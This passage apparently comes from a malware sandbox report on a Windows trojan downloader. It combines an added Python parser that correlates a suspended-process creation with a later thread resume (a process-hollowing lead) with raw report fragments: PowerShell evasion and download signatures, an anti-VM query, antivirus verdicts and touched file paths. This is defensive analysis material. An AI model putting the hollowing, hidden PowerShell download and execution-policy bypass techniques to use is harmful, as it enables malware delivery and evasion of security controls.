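The CreateProcessInternalW and NtResumeThread entries above share the thread handle 0x000002e8: explorer.exe (the look-alike under C:\Windows (x86)) is created with CREATE_SUSPENDED and its initial thread is resumed later with suspend_count 1, which is the shape of process hollowing or of any inject-then-resume technique. The report lists the resume before the creation and under a different process identifier, so the two have to be tied together by handle. The following Python is an added example, not part of the report, that parses the report's API-block format and makes that correlation; it also decodes dwCreationFlags and separates the RWX NtAllocateVirtualMemory commits made through the GetCurrentProcess() pseudo-handle 0xffffffff (in-process unpacking) from those aimed at a remote process. The excerpt is copied from the report and trimmed to the fields used; handle values are per-process and get reused, so a match on the handle alone is a lead to confirm, not proof.

```python
import re

# Excerpt of the report's API blocks, trimmed to the fields used here (constructed test input).
# The report lists the NtResumeThread before the CreateProcessInternalW that created the thread.
REPORT_EXCERPT = r"""
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 260
region_size: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 1160
1 0 0

CreateProcessInternalW

thread_handle: 0x000002e8
process_identifier: 2196
filepath: C:\Windows (x86)\explorer.exe
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
1 1 0
"""

NAME_RE = re.compile(r"^[A-Za-z_]\w*$")           # an API name alone on a line
FIELD_RE = re.compile(r"^(\w+):\s*(.*)$")          # "key: value" (value may be empty)
RESULT_RE = re.compile(r"^-?\d+(?:\s+-?\d+)*$")    # "status return repeated"

# dwCreationFlags bits (winbase.h); bits not listed are reported as a hex remainder.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS", 0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP", 0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT", 0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40
SELF_HANDLES = {0xFFFFFFFF, 0xFFFFFFFFFFFFFFFF}   # GetCurrentProcess() as logged for 32-/64-bit callers


def parse_api_blocks(text: str) -> list:
    """Turn the report's API listing into [{'api', 'args', 'result'}, ...]."""
    events, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        field = FIELD_RE.match(line)
        if field and cur is not None:
            cur["args"][field.group(1)] = field.group(2)
        elif NAME_RE.match(line):
            cur = {"api": line, "args": {}, "result": None}
            events.append(cur)
        elif RESULT_RE.match(line) and cur is not None:
            nums = [int(x) for x in line.split()] + [None, None]
            cur["result"] = {"status": nums[0], "return": nums[1], "repeated": nums[2]}
            cur = None
        # table headers and signature summaries match none of the patterns and are skipped
    return events


def first_int(value: str) -> int:
    """'67634196 (CREATE_...)' -> 67634196; '0x000002e8' -> 744."""
    token = value.split()[0]
    return int(token, 16) if token.lower().startswith("0x") else int(token)


def decode_creation_flags(value: int) -> list:
    names = [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]
    rest = value & ~sum(CREATION_FLAGS)
    return names + ([f"0x{rest:08x}"] if rest else [])


def suspended_then_resumed(events: list) -> list:
    """Pair CREATE_SUSPENDED process creations with an NtResumeThread on the same thread handle."""
    suspended = {}
    for ev in events:
        if ev["api"] == "CreateProcessInternalW" and first_int(ev["args"].get("creation_flags", "0")) & CREATE_SUSPENDED:
            suspended[first_int(ev["args"]["thread_handle"])] = ev
    findings = []
    for ev in events:
        if ev["api"] != "NtResumeThread":
            continue
        creator = suspended.get(first_int(ev["args"]["thread_handle"]))
        if creator is not None:
            findings.append({
                "created_image": creator["args"].get("filepath"),
                "thread_handle": ev["args"]["thread_handle"],
                "resumed_in_pid": first_int(ev["args"].get("process_identifier", "0")),
                "suspend_count": first_int(ev["args"].get("suspend_count", "0")),
            })
    return findings


def rwx_allocations(events: list) -> dict:
    """Count PAGE_EXECUTE_READWRITE commits in the caller's own process versus a remote one."""
    counts = {"self": 0, "remote": 0}
    for ev in events:
        if ev["api"] != "NtAllocateVirtualMemory":
            continue
        if first_int(ev["args"].get("protection", "0")) & PAGE_EXECUTE_READWRITE:
            handle = first_int(ev["args"].get("process_handle", "0"))
            counts["self" if handle in SELF_HANDLES else "remote"] += 1
    return counts
```

A WriteProcessMemory or NtMapViewOfSection against the suspended process between the two calls would turn the lead into a confirmed hollowing; the report does not show one, so the finding stays at "suspended create followed by resume".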
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
value Uses powershell to execute a file download from the command line
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 76 (SystemFirmwareTableInformation)
-1073741789 0
Bkav W32.AIDetect.malware2
McAfee RDN/Generic.dx
Cylance Unsafe
Alibaba Trojan:Win32/AutoitInject.513c1428
K7GW Trojan ( 005036361 )
CrowdStrike win/malicious_confidence_60% (W)
Arcabit Trojan.Generic.D22FAC3D
Symantec Downloader
ESET-NOD32 multiple detections
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.36678717
NANO-Antivirus Trojan.Script.Dwn.ehnknf
MicroWorld-eScan Trojan.GenericKD.36678717
Avast SFX:Agent-E [Trj]
Tencent Powershell.Trojan.Generic.Aduc
Ad-Aware Trojan.GenericKD.36678717
Comodo TrojWare.Win32.TrojanDownloader.BadShell.XST@7pmj40
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
FireEye Trojan.GenericKD.36678717
Emsisoft Trojan.GenericKD.36678717 (B)
MAX malware (ai score=88)
Gridinsoft Trojan.Win32.Downloader.sa
Microsoft Trojan:Win32/AutoitInject.BI!MTB
AegisLab Trojan.PowerShell.Generic.4!c
ZoneAlarm HEUR:Trojan.PowerShell.Generic
GData Trojan.GenericKD.36678717
ALYac Heur.BZC.ONG.Boxter.371.2FE094D5
TrendMicro-HouseCall TROJ_GEN.R002C0DDA21
Rising Trojan.Ursnif!8.A22D (TOPIS:E0:A0I4dgv936)
Ikarus Trojan.VBS.Ursnif
MaxSecure Win.MxResIcn.Heur.Gen
AVG SFX:Agent-E [Trj]
Cybereason malicious.784185
Panda Trj/CI.A
Qihoo-360 Win32/Trojan.AutoitInject.HwYDf4cA
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\updateW\win.com
file C:\Users\test22\AppData\Local\Temp\updateW\64a1.com